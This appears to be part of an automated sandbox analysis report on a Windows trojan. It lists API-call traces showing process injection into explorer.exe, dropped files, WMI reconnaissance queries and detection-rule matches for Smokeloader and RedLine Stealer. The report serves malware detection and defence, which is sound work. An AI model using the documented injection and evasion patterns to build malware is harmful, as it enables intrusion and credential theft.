Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,	0_2_00403277
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00401514 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00401542 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00403247 NtTerminateProcess,GetModuleHandleA,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00401549 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_0040324F NtTerminateProcess,GetModuleHandleA,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00403256 NtTerminateProcess,GetModuleHandleA,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00401557 LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_0040326C NtTerminateProcess,GetModuleHandleA,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00403277 NtTerminateProcess,GetModuleHandleA,	4_2_00403277
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_004014FE LocalAlloc,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_00403290 NtTerminateProcess,GetModuleHandleA,	4_2_00403290
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,	6_2_00403043
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004014C4 NtAllocateVirtualMemory,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00401508 NtAllocateVirtualMemory,	6_2_00401508
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004014CF NtAllocateVirtualMemory,	6_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004015D5 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004014DE NtAllocateVirtualMemory,	6_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004015DF VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004015E6 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004015F2 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004014F5 NtAllocateVirtualMemory,	6_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004014F8 NtAllocateVirtualMemory,	6_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004014FB NtAllocateVirtualMemory,	6_2_004014FB
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,	7_2_00403043
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004014C4 NtAllocateVirtualMemory,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014C4
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_00401508 NtAllocateVirtualMemory,	7_2_00401508
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004014CF NtAllocateVirtualMemory,	7_2_004014CF
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004015D5 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015D5
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004014DE NtAllocateVirtualMemory,	7_2_004014DE
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004015DF VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015DF
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004015E6 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015E6
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004015F2 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015F2
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004014F5 NtAllocateVirtualMemory,	7_2_004014F5
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004014F8 NtAllocateVirtualMemory,	7_2_004014F8
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_004014FB NtAllocateVirtualMemory,	7_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E4B92 RtlMoveMemory,NtUnmapViewOfSection,	10_2_006E4B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E33C3 NtQueryInformationFile,	10_2_006E33C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E342B NtQueryObject,NtQueryObject,RtlMoveMemory,	10_2_006E342B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	10_2_006E349B
Source: C:\Windows\explorer.exe	Code function: 13_2_00CB38B0 NtUnmapViewOfSection,	13_2_00CB38B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	15_2_00191016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00191819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	15_2_00191819
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00191A80 NtCreateSection,NtMapViewOfSection,	15_2_00191A80
Source: C:\Windows\explorer.exe	Code function: 16_2_008C355C NtUnmapViewOfSection,	16_2_008C355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_02FE1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	18_2_02FE1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_02FE18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	18_2_02FE18BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_02FE1B26 NtCreateSection,NtMapViewOfSection,	18_2_02FE1B26
Source: C:\Windows\explorer.exe	Code function: 19_2_012B370C NtUnmapViewOfSection,	19_2_012B370C

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE29AC8	8_2_00007FF6DFE29AC8
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2A534	8_2_00007FF6DFE2A534
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2B43C	8_2_00007FF6DFE2B43C
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2DC20	8_2_00007FF6DFE2DC20
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE23220	8_2_00007FF6DFE23220
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2A78C	8_2_00007FF6DFE2A78C
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2213C	8_2_00007FF6DFE2213C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E2198	10_2_006E2198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006EC2F9	10_2_006EC2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006FB35C	10_2_006FB35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_00734438	10_2_00734438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006FB97E	10_2_006FB97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E6E6A	10_2_006E6E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_00705F08	10_2_00705F08
Source: C:\Windows\explorer.exe	Code function: 13_2_00CB1E20	13_2_00CB1E20
Source: C:\Windows\explorer.exe	Code function: 16_2_008C2054	16_2_008C2054
Source: C:\Windows\explorer.exe	Code function: 16_2_008C2860	16_2_008C2860
Source: C:\Windows\explorer.exe	Code function: 19_2_012B2A04	19_2_012B2A04
Source: C:\Windows\explorer.exe	Code function: 19_2_012B20F4	19_2_012B20F4
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040BC5C	38_2_0040BC5C
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_00408C7A	38_2_00408C7A
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040C889	38_2_0040C889
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040D5C1	38_2_0040D5C1
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040C1AD	38_2_0040C1AD
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040B70B	38_2_0040B70B
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040BC5C	39_2_0040BC5C
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_00408C7A	39_2_00408C7A
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040C889	39_2_0040C889
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040D5C1	39_2_0040D5C1
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040C1AD	39_2_0040C1AD
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040B70B	39_2_0040B70B

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\FDDB.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 006E7F70 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 006E8801 appears 40 times

Source: 9VgIkx4su0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@63/15@7/4

Source: C:\Users\user\AppData\Roaming\dghchav

Code function: 38_2_00401490 GetCurrentProcessId,GetCurrentProcessId,GetCharWidth32A,CreateDCW,CreateDCW,FoldStringW,EnumSystemCodePagesW,CreateDCW,CreateHardLinkA,WinHttpOpen,InterlockedDecrement,_strlen,LocalAlloc,LoadLibraryA,LoadLibraryA,GetProcAddress,GetLastError,InterlockedCompareExchange,InterlockedCompareExchange,GetDiskFreeSpaceExA,LoadLibraryA,ReadConsoleInputW,DebugBreak,LCMapStringA,SetEnvironmentVariableW,LCMapStringA,SetEnvironmentVariableW,OpenEventA,GetLastError,GetFileAttributesW,GetShortPathNameW,LocalFlags,GetFileAttributesW,GetShortPathNameW,LocalFlags,RaiseException,SetFileTime,SetComputerNameA,InterlockedDecrement,LoadLibraryW,

38_2_00401490

Source: C:\Users\user\Desktop\9VgIkx4su0.exe

Code function: 0_2_00621706 CreateToolhelp32Snapshot,Module32First,

0_2_00621706

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Code function: 8_2_00007FF6DFE27138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,

8_2_00007FF6DFE27138

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\eihchav

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\3E40.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: GxBn	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: O$b~	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: ":,x	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: ls/K	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: K`:	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: <'w	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: J}s`	38_2_00401840
Source: C:\Users\user\AppData\Roaming\dghchav	Command line argument: 7-T=	38_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: GxBn	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: O$b~	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: ":,x	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: ls/K	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: K`:	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: <'w	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: J}s`	39_2_00401840
Source: C:\Users\user\AppData\Roaming\eihchav	Command line argument: 7-T=	39_2_00401840

Source: 9VgIkx4su0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="332"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="420"::GetOwner
